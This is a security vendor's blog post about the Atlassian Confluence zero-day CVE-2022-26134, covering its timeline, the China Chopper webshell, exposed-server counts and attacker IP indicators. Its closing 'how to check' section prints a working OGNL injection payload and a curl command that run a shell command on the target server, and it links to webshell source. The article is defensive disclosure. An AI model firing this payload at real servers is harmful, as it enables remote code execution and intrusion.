According to Volexity 1), a cybersecurity company in Washington, DC, a webshell was discovered in Atlassian Confluence server during an incident response investigation. Volexity observed it as an Atlassian Confluence-related issue and generated an exploit code. However, the company later determined that it was a zero-day vulnerability that could execute remote code even after the latest patch was completed, and reported the issue to Atlassian (May 31 PDT.)

After receiving the issue report and identifying it as a zero-day vulnerability, Atlassian issued a security advisory for the critical unauthenticated remote code execution (June 3 PDT.) Volexity has also published a blog post and a tweet.

1)Volexity’s CTO Michael Hale Ligh is one of the authors of the world-famous cybersecurity book, Malware Analyst’s Cookbook.
Volexity's updated tweet about Atlassian Confluence Zero-day Exploitation

Volexity’s updated tweet about zero-day vulnerability in Atlassian Confluence Exploitation

Timeline of zero-day vulnerability in Atlassian Confluence

  • May 31: Volexity found zero-day vulnerability in Atlassian Confluence.
  • Jun 2, 1 p.m.: Atlassian and Volexity officially issued a security advisory for CVE-2022-26134 Vulnerability.
  • June 3, 8 a.m.: Atlassian announced how to mitigate vulnerabilities without security patches.
  • June 3, 8 p.m.: Atlassian released security updates to address vulnerabilities.

(Time standards are based on PDT)

Webshell that was also used for MS Exchange Server attacks

According to Volexity’s Analysis Report, an attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell, particularly the China Chopper webshell. China Chopper webshell is a notorious security vulnerability issue that was also used during the last Microsoft Exchange Server crisis. If the hacker penetrates the server and uploads this web shell, believed to be created by the Chinese hacking group Hafnium, this will allow the attacker to access the server freely even if the zero-day security patch is up to date.

GitHub Link, known as the China Chopper Webshell
https://github.com/tennc/webshell/blob/master/caidao-shell/%E8%8F%9C%E5%88%80jsp%E4%BF%AE%E6%94%B9.jsp

Other Webshells
md5: ea18fb65d92e1f0671f23372gf60e7
sha1 : 80b327ec19c7d14cc10511060ed3a4abffc821af

Diagnose with Virustotal
https://www.virustotal.com/gui/file/5f3d46a5d18c25c7ee63f6bbe9af930d3be44f541625363a029f23de25cd36ae

Mitre attack’s information on the China Chopper
https://attack.mitre.org/software/S0020

Confluence servers still exposed to the Internet

Despite a zero-day attack that began during the Memorial Day holidays in the United States, Atlassian seems to have released security patches at a fairly rapid pace. However, the problem is that there are still many Confluence servers connected to the Internet. Similar to the case with the Microsoft Exchange Server issue, servers that were left unattended for months even after security patches were released are still connected to the Internet without being patched.

AI Spera’s CIP team used Criminal IP to determine the number of Atlassian Confluence servers connected to the Internet. In Element Analysis, using the tech_stack: “Atlassian Confluence” filter, you can view statistics on country-specific Confluence exposed to the Internet.

tech_stack: “Atlassian Confluence”

Statistics of more than 5,600 Confluence servers installed in over 70 countries searched by Element Analysis of Criminal IP

Statistics of more than 5,600 Confluence servers installed in over 70 countries searched by Element Analysis of Criminal IP

The screenshot above shows that more than 5,600 Confluence servers have been installed in 70 countries on the internet. When CIP Team checked individual IP addresses through Criminal IP’s Asset search, the team actually found that they were exposed to the internet defenseless with Confluence installed as follows.

Exposed Confluence Server Found by Criminal IP Asset Search

Exposed Confluence Server Found by Criminal IP Asset Search

Exposed Confluence Server Found by Criminal IP Asset Search

Exposed Confluence Server Found by Criminal IP Asset Search

What makes this even more problematic is that there are quite a few cases where these IP addresses are of actual companies or institutions. Even though most cloud servers, such as AWS, MS Azure, and Google, are found in ASN Names of IP addresses,  this is simply the result of institutions or companies using cloud servers, and the HTML title shown in Dashboard below can be inferred from any company or organization.

ASN of the exposed Confluence server discovered in Criminal IP

ASN of the exposed Confluence server discovered in Criminal IP

Since these wiki systems do not have a large number of servers but only one or two, it is better to check the low number of results first when searching for the ASN Name of an IP address. For example, although only one of the following cases has been detected, ASN Name could be an IP address used by schools such as university name, or a Confluence server installed in the school laboratory.

IP addresses of universities with internet-exposed Confluence servers retrieved from the Criminal IP using the keyword "ASN Name"

IP addresses of universities with internet-exposed Confluence servers retrieved from the Criminal IP using the keyword “ASN Name”

In fact, in the following case, Confluences of an American medical school is found on the internet, and to make things worse, all the information is all open without login authentication.

The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.

The exposed Confluence of the U.S. Medical School searched by Criminal IP. The information is disclosed without login authentication.

Analysis on Attacker’s IP Address

According to the IOC released by Volexity, 15 IP addresses interacting with webshells on Confluence server were found after the first case of Confluence attack. After analyzing these IP addresses with  Criminal IP, the following five are identified as using VPN services. These days, attackers who carry out zero-day or APT attacks tend to use VPN services rather than IP addresses with a high malicious indexes. This leads to a new security trend in which companies must detect VPN IP addresses for inbound IP, as more attackers are expected to use VPNs to leave no trace when they pass through pre-penetrated servers.

Below are the IP addresses tagged as VPN in Criminal IP. In addition, one Tor IP address has also been identified.

156.146.56.136 VPN
198.147.22.148 VPN
59.163.248.170 VPN
64.64.228.239 VPN
66.115.182.102 VPN
66.115.182.111 VPN

156.146.34.9 Tor

One IP address of the 15 Confluence zero-day exploit cases released by Volexity is detected as a VPN IP address on Criminal IP.

One IP address of the 15 Confluence zero-day exploit cases released by Volexity is detected as a VPN IP address on Criminal IP.

How to Check for Vulnerabilities

If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches :

https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/

If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability.

curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response

On June 3rd, 2022, Atlassian released a patch for CVE-2022-26134. However, some organizations may feel burdened by shutting down servers for security updates as Confluence is a wiki system used by many people to share important information. In this case, Atlassian is also suggesting a manual solution for security issues only, so please use that method to take action in accordance with Atlassian’s recommendations.

With the zero-day attack, suppliers have been actively working on appropriate security updates. However, unlike most cases, the vulnerabilities in web-based systems are easy to attack from outside as soon as zero-day occurs without complicated conditions. In addition, if the webshell backdoor is already uploaded, additional security checks must be carried out because a path has already been created for hackers to freely access the system even after performing the patch.

When such a vulnerability in remote code execution using zero-day appears, a pattern that leads to building webshell backdoor continues. Webshell attacks such as Microsoft Exchange and Confluence incidents are expected to continue in the future.

For reference, Confluence suffered from the zero-day attack last year. Confluence is a well-known system in the world, but at the same time, it is a major target of cyber attacks. This is because it is a server where important information from companies and institutions is gathered in one place, making hackers drool. Therefore, the first thing companies or organizations that use Confluence should do is immediately block external access to their Confluence server. In addition, periodic monitoring and inspection of the attack surface should be performed to prevent such critical information management systems from being externally exposed.


Source : Criminal IP